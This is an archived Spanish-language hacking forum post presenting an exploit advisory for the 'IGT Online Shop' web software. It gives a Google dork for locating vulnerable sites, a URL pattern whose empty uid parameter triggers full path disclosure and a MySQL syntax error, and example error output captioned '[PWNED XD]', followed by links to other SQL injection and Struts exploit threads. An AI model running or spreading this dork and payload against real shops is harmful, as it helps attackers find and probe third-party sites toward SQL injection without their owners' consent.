comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Exploit Full path disclosure and Sql Error ONLINE SHOP IGT

  • 0 Respuestas
  • 1461 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado MaztoR

  • *
  • Underc0der
  • Mensajes: 56
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • MaztoR [IN]-Security
    • Email
  • Skype: Maztor-
« en: Abril 05, 2012, 09:20:06 pm »
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
# Author: Mazt0r
# Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT
# Date: 24/02/2012
# software: IGT Online Shop
# link: http://www.igt.com.hk
# Version: ALL
# Category: webapps
# Google dork: inurl:company_index.php
# Tested on: Linux



----------------
Vulnerability
----------------

Exploit:
======================

http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]

======================
Example:
======================

http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=

Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3

Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]



----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
======================== Camaradas! DDLR & CL ========================================
Greetz : zer0-zo0rg | Zeux0r | SeguridadBlanca | k4rl | Pum4 | TheLatin | 4t0m1x | Destroyer
-------------------------------------------------------------------------------------
« Última modificación: Abril 05, 2012, 10:39:22 pm por MaztoR »
-------------------------------------
| Twitter: @Mazt0r                
| Site: No tienes permisos para ver links. Registrate o Entra con tu cuenta        
| Skype: Maztor-                    
-------------------------------------

 

¿Te gustó el post? COMPARTILO!



Mysql injection avanzada: "doble query/error based"

Iniciado por q3rv0

Respuestas: 2
Vistas: 2415
Último mensaje Agosto 30, 2012, 04:26:01 am
por andrewtwo
Destripando la logica de una inyeccion [Mysql Doble Query Error Based]

Iniciado por q3rv0

Respuestas: 4
Vistas: 2845
Último mensaje Junio 15, 2013, 11:08:53 am
por morodog
Double query Error Based Sql Injection

Iniciado por arthusu

Respuestas: 0
Vistas: 1716
Último mensaje Abril 10, 2013, 05:01:53 am
por arthusu
XSS a travez de ERROR

Iniciado por q3rv0

Respuestas: 1
Vistas: 2150
Último mensaje Agosto 26, 2012, 06:11:11 pm
por hdbreaker
Exploit para Apache Struts (ejecución remota de comandos) [Tomcat]|CVE2017-5638

Iniciado por Eschiclers

Respuestas: 9
Vistas: 3249
Último mensaje Marzo 23, 2017, 03:57:38 pm
por zoro248